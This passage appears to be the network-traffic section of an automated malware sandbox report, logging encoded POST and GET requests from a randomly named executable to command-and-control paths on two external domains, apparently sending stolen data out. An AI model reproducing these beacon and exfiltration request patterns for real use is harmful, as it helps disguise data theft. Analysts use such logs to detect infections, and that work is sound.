                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.449999103.230.159.86803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:04.378077030 CET796OUTPOST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 61 61 77 43 32 5a 33 70 73 31 50 5a 43 6b 54 34 59 63 6c 4b 47 4f 45 66 4e 48 38 49 69 4f 44 47 6e 55 73 38 79 4b 5a 35 31 69 54 59 66 64 41 42 56 31 53 6b 78 72 51 61 34 45 35 32 55 39 49 58 69 72 56 4b 64 71 47 59 48 57 4b 42 72 34 5a 43 6b 4b 31 4f 57 67 4d 5a 78 32 4d 74 65 47 59 48 4a 37 66 56 32 32 67 34 5a 47 39 34 76 32 62 6b 44 43 6b 32 30 2b 62 4b 31 65 6a 73 65 6d 69 49 4a 49 4f 38 32 6f 53 43 35 50 77 2f 76 47 78 74 33 4e 41 64 4b 6b 55 4f 73 74 78 4b 6e 47 4f 73 6a 49 68 45 78 51 7a 4a 65 4d 6e 4b 6f 3d
                                                                      Data Ascii: xP7x=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzaawC2Z3ps1PZCkT4YclKGOEfNH8IiODGnUs8yKZ51iTYfdABV1SkxrQa4E52U9IXirVKdqGYHWKBr4ZCkK1OWgMZx2MteGYHJ7fV22g4ZG94v2bkDCk20+bK1ejsemiIJIO82oSC5Pw/vGxt3NAdKkUOstxKnGOsjIhExQzJeMnKo=
                                                                      Jan 8, 2025 16:14:05.235606909 CET479INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:05 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.450016103.230.159.86803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:06.925929070 CET10878OUTPOST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 53 61 78 30 69 5a 32 4b 55 31 64 4a 43 6b 51 34 59 64 6c 4b 47 58 45 62 68 62 38 49 2f 37 44 45 66 55 71 66 4b 4b 65 4b 74 69 63 59 66 64 4c 68 56 30 4e 30 77 72 51 62 4a 4e 35 32 45 39 49 58 69 72 56 4b 78 71 43 4b 6a 57 5a 52 72 37 63 43 6b 65 78 4f 58 46 4d 5a 6f 42 4d 74 61 57 59 78 35 37 66 31 6d 32 6a 4b 78 47 69 49 76 30 59 6b 44 61 6b 32 77 6c 62 4f 64 53 6a 73 72 42 69 4b 56 49 4c 4c 75 30 4e 7a 31 6a 7a 50 36 62 68 61 50 61 4c 71 2b 37 55 66 30 6b 78 66 48 65 4f 39 2f 6f 67 32 63 70 71 5a 4b 74 31 71 41 6e 32 41 39 78 72 4b 67 58 6c 35 6d 5a 35 6a 6b 58 4d 79 6b 55 30 37 78 42 5a 5a 63 73 38 2b 5a 42 75 6d 73 2f 35 52 74 2b 49 2b 69 35 49 74 57 77 67 4d 49 34 2f 72 4b 58 73 32 58 54 50 41 56 34 4b 67 66 38 6a 57 67 31 6a 67 76 6b 42 6e 4c 48 38 65 48 4c 5a 76 69 6a 53 31 47 6a 71 32 63 41 46 4a 32 55 30 51 49 74 42 68 79 43 73 57 4a 4e 35 63 67 7a 53 [TRUNCATED]
                                                                      Data Ascii: xP7x=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzSax0iZ2KU1dJCkQ4YdlKGXEbhb8I/7DEfUqfKKeKticYfdLhV0N0wrQbJN52E9IXirVKxqCKjWZRr7cCkexOXFMZoBMtaWYx57f1m2jKxGiIv0YkDak2wlbOdSjsrBiKVILLu0Nz1jzP6bhaPaLq+7Uf0kxfHeO9/og2cpqZKt1qAn2A9xrKgXl5mZ5jkXMykU07xBZZcs8+ZBums/5Rt+I+i5ItWwgMI4/rKXs2XTPAV4Kgf8jWg1jgvkBnLH8eHLZvijS1Gjq2cAFJ2U0QItBhyCsWJN5cgzS5a8HOPofEPskdY726sT44zt8rboXKc4AFVkVxJt7YukPLDjJoOLJHi9cGcvMjiCxPBtsaFyzKldAMpcM9DZ5HmCcqL8oACZfAGCFuOtITOhMzio1UkkJtYBi1cazZp7tKGS/is0er/VZ6OKO9n4A5aTVuyMGmfjd+8rl21Y+Pz4rbjHv8XcWqI91AYxeBdST3wOYSgbYfHzjBCqhHN9sMpp8QvW7kLw5Kw8ur6tkfZMqQ2KNXXC8pzspDo4IQOtlK5WlzHwdTtHd/cyNkYu0hIqWJX9aCRekEvfujNpCUSGqAmgg5UgI4aeS8GTk1mVUTvWEr+1FeyMLxY/5S906jqLTQtw4dvx/NUSfLH77FveBNE1+psaFG2f9o4EKoMOBytjUMtVN0xCXKzmWBS2NtB6z5pH3hvu9iRgij9LjSdmYyhNgZ0/BJ21F8EBMVXl6n1RqP86UQriApuXyr4/80KenpVHGtBHGcmiWyMxu0Zt0/SCoEcU4mqDCYN7UxuA7nTHNxm5E6PNzx2cHuoKxC6y9cAts3dLvOZAJa05JnJDqOVz6jLJBNTZQvZH3DRj4+NF/29ep47Kzt0Tufp/B7FtZZfBFvuXL7vnJD5WTtQtUU1ftuOQ9WjpT3IC3uZ5j8N1qVl6i1y7np4LeZIjJ3XaYg6rY/iJ2zi [TRUNCATED]
                                                                      Jan 8, 2025 16:14:08.022977114 CET479INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:07 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.450022103.230.159.86803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:09.473546982 CET495OUTGET /bwyw/?xP7x=zeqgG3zf3rSD22A0zF0pS4vI7saWqLmuTT/213oW5xKBpEmM0JRqJaaJcKUMxr+7Esc9obOTS2jlvNaYH8wffK6dIQcBGg0ObpA/yX4xEky+b5csM5WXdi0=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:14:10.348237038 CET479INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:10 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.450023188.114.97.3803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:15.400223017 CET779OUTPOST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 64 30 73 37 7a 51 51 51 72 62 36 53 66 43 6c 39 55 5a 77 6d 76 74 64 4f 58 55 69 4e 50 73 6c 6d 41 33 43 6f 67 64 67 67 30 55 51 78 56 6d 77 73 49 41 4a 65 39 34 32 6b 30 57 46 69 37 65 37 51 4e 48 76 67 33 34 7a 34 58 62 2b 75 6d 62 65 2f 4b 66 4b 41 43 65 30 44 4c 33 48 4f 78 6a 6d 41 55 4b 6d 38 58 6e 4c 50 4c 61 6d 53 32 6b 59 6f 77 55 33 6e 42 37 54 75 54 73 4a 61 5a 34 6e 43 50 73 51 5a 69 47 44 4c 2f 6f 76 53 6b 6c 6c 73 6a 38 36 4f 78 64 76 45 63 53 52 73 58 44 77 61 4a 55 50 39 4a 38 6e 45 4c 71 6e 4f 53 38 6a 7a 70 36 62 41 32 69 63 76 74 77 55 52 64 58 7a 70 2f 77 3d 3d
                                                                      Data Ascii: xP7x=d0s7zQQQrb6SfCl9UZwmvtdOXUiNPslmA3Cogdgg0UQxVmwsIAJe942k0WFi7e7QNHvg34z4Xb+umbe/KfKACe0DL3HOxjmAUKm8XnLPLamS2kYowU3nB7TuTsJaZ4nCPsQZiGDL/ovSkllsj86OxdvEcSRsXDwaJUP9J8nELqnOS8jzp6bA2icvtwURdXzp/w==
                                                                      Jan 8, 2025 16:14:16.026437044 CET845INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tYRZMjvtKDvtYtVb3lYvBpbbqmLG06P6yt9XF5QwA7ZGUcLTM3Q%2BNNmmC4meZ%2FmNdVifSxpekpIcdjl68KTJ2HcBfjbLX7%2FB2x1BhRMRizEqMPJhRL891e7C91C8pYtHsLxZD3zV7rELpGA%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed22e0aba441df-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=779&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                      Data Ascii: 14
                                                                      Jan 8, 2025 16:14:16.026834011 CET5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.450024188.114.97.3803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:17.941776991 CET799OUTPOST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 38 78 56 48 41 73 4a 42 4a 65 2b 34 32 6b 73 6d 46 74 6d 4f 36 39 4e 48 69 66 33 36 33 34 58 61 65 75 6d 5a 32 2f 4b 73 69 48 4e 75 30 57 4e 33 48 41 2b 44 6d 41 55 4b 6d 38 58 6e 66 31 4c 65 4b 53 32 56 49 6f 77 77 6a 6b 50 62 54 76 53 73 4a 61 64 34 6e 47 50 73 51 76 69 48 65 51 2f 75 72 53 6b 6b 56 73 67 6f 4f 52 2f 64 75 42 53 79 52 2f 62 57 45 53 4a 56 71 32 43 64 58 43 4e 72 2f 52 58 36 75 70 34 4c 36 58 6b 69 34 63 77 33 64 6c 51 55 4f 67 6b 31 45 75 32 4b 4c 62 53 50 64 44 31 4c 57 69 33 35 4a 65 59 79 45 3d
                                                                      Data Ascii: xP7x=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g8xVHAsJBJe+42ksmFtmO69NHif3634XaeumZ2/KsiHNu0WN3HA+DmAUKm8Xnf1LeKS2VIowwjkPbTvSsJad4nGPsQviHeQ/urSkkVsgoOR/duBSyR/bWESJVq2CdXCNr/RX6up4L6Xki4cw3dlQUOgk1Eu2KLbSPdD1LWi35JeYyE=
                                                                      Jan 8, 2025 16:14:18.610270977 CET856INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5slkb%2FcdyNrovpIyoAJUiiDdbou1Skt4tZCjQWwi8UtTIjfhG%2FkunzltPodJ5iMYNAVtYwkZEwpawvQyBX2cJva90I%2Fqa3NLA%2BsgeoNjPTqIcjxOwL%2Bicx8AXdGrd8x5AUZyb4%2BE1Ae73J0%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed22f0aae64286-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 140


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.450025188.114.97.3803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:14:20.734805107 CET10881OUTPOST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 30 78 55 31 59 73 49 69 68 65 2f 34 32 6b 79 57 45 4b 6d 4f 36 46 4e 48 71 62 33 36 36 44 58 66 61 75 6d 36 4f 2f 64 4e 69 48 57 65 30 57 41 58 48 4e 78 6a 6e 4b 55 4b 32 34 58 6e 50 31 4c 65 4b 53 32 57 67 6f 33 6b 33 6b 66 72 54 75 54 73 4a 57 5a 34 6e 2b 50 73 34 2f 69 48 4c 6c 2f 65 4c 53 6e 45 46 73 69 62 6d 52 67 74 75 44 66 53 51 69 62 57 42 4d 4a 56 32 63 43 64 6a 6b 4e 72 62 52 61 74 4c 77 6e 2f 32 56 33 45 55 6d 7a 46 64 59 64 55 47 6b 76 6c 63 6d 33 66 76 51 46 37 64 71 78 70 48 6c 73 72 56 32 4a 46 4f 61 49 71 68 4f 54 2b 65 44 56 62 4f 37 36 51 49 66 76 6f 35 62 61 61 49 47 47 54 51 51 72 64 61 73 4d 37 31 48 6e 6f 2f 49 43 76 55 77 38 5a 2f 37 44 51 39 55 6a 6d 75 77 55 39 75 30 37 63 2b 68 39 66 78 51 55 45 44 32 4a 70 72 55 64 51 44 32 52 37 67 64 36 39 35 42 6e 77 6e 48 6f 47 6f 58 69 5a 33 53 41 75 72 42 45 6e 59 34 2b 6d 64 52 71 69 6c 36 36 [TRUNCATED]
                                                                      Data Ascii: xP7x=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g0xU1YsIihe/42kyWEKmO6FNHqb366DXfaum6O/dNiHWe0WAXHNxjnKUK24XnP1LeKS2Wgo3k3kfrTuTsJWZ4n+Ps4/iHLl/eLSnEFsibmRgtuDfSQibWBMJV2cCdjkNrbRatLwn/2V3EUmzFdYdUGkvlcm3fvQF7dqxpHlsrV2JFOaIqhOT+eDVbO76QIfvo5baaIGGTQQrdasM71Hno/ICvUw8Z/7DQ9UjmuwU9u07c+h9fxQUED2JprUdQD2R7gd695BnwnHoGoXiZ3SAurBEnY4+mdRqil66gk/HY9Xr0QMNAlWc5Wh6t+evbBjVswakmthvJw9aRP2ObhJby+d89L9YxO1LoRgas/o+ljetPpw+DrDEZDyF9+jzH31atzyBAiSlyy4cTfTuMxEsgchXHxmwlLlEy5dBWiOXJHvfChbCFEB0bAd0w+dCeWiTqUwPoHear2Ez9CDwafgPhs5Ux+3NtLZTOjHv+J+f8tuleuz+qEH7vFkoF8dFddrZEb1n5h2oN0jCksm3rVBz/xLBe9JkH+o6Nzh4Rh7M6g//r9/QnPLcdOTyYwk019cFFlWAza6/00fT193Ni5EM4TIejhqc2u3jto/3JeTTJlo2zXR5ULiZagRyDaIRoyuXAQWDPgBbC0fmk6hYggCZXxwY0xUlzSkPkTUv4FL3rZCxLoyHD+jaGFyJEHNhkltfQW/t0Amye3VQf4mbt2cSXAZg1cgDGsEYTxhP40dsVGsTdnLJCTk/3bJh+GU8PqLRGkYryXijyAVmCP+Ld58FLS/czb/zIKN/MiiXKy/DQupO7kizqYdAeJgUYNPiUSMvuvcLvK4iBeqUUk933NJTHed+1hRP2SvMR030HIfNwOpDkAXlbFOET/nkIVYV5FGK3K9zBEw8MRJHelD3fpzNMSqySSOM2qohu/nIR2NRhnrSLEuM/lhN/FkcijHlSg+54KiWJA [TRUNCATED]
                                                                      Jan 8, 2025 16:14:21.386797905 CET856INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
